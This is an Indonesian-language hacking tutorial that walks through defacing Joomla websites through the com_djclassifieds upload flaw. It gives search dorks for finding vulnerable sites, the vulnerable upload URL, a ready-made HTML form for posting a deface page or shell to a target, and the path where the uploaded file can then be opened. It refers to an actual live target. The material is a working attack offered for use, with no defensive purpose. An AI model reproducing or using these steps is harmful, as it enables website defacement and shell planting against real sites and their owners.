Metode Joomla Com_Djclassifieds

Deface CMS Joomla menggunakan poc Com_Djclassifieds

Oke siapin bahannya

-Dork

inurl:/components/com_djclassifieds/
inurl:/com_djclassifieds

-Exploit

index.php?option=com_djclassifieds&task=upload&tmpl=component

-Csrf lu salin+lu simpen dengan ext .html

<html><body><form method="post" action="https://www.nama site lu/index.php?option=com_djclassifieds&task=upload&tmpl=component" enctype="multipart/form-data"><input type="file" name="file"/><input type="hidden" name="name" value="nama script html / shell lu" /><input type="submit" value="submit"/></form></body></html>

next >> kita dorking dolo gayn

kebetulan gua udah ada live targetnya jadi kita tusbol saja langsung ok >>

contoh : http://www.SM1L3GANS.com/index.php?option=com_djclassifieds&task=upload&tmpl=component

nah kalo vuln bakalan muncul kaya gini

kalo tulisannya bukan kaya yg diatas berarti cari target lain^.^

next >> salin link web yg vuln tadi terus masukin ke csrf

inget gayn: salin/ubah web target yg vuln+ubah jadi nama script lu 

yg di garisin merah ubah jadi web target lu yg vuln dan yg digarisin putih ubah jadi script dengan ext .html trus simpan

next >> buka csrfnya >> pilih file dan cari script dengan yg sudah ditentukan sebelumnya,,, kebetulan script gua 450.html 

tinggal klik submit, kalo berhasil bakalan muncul ke yg awal tadi 

trus cara ngaksesnya gimana sterr?:::v

nih gini ya budjank

contoh: https://www.SM1L3GANS.com/tmp/djupload/namascriptlu.html

dan dorrr;;;;v

note: kalo kurang paham bisa komen dibawah ya gayn::vv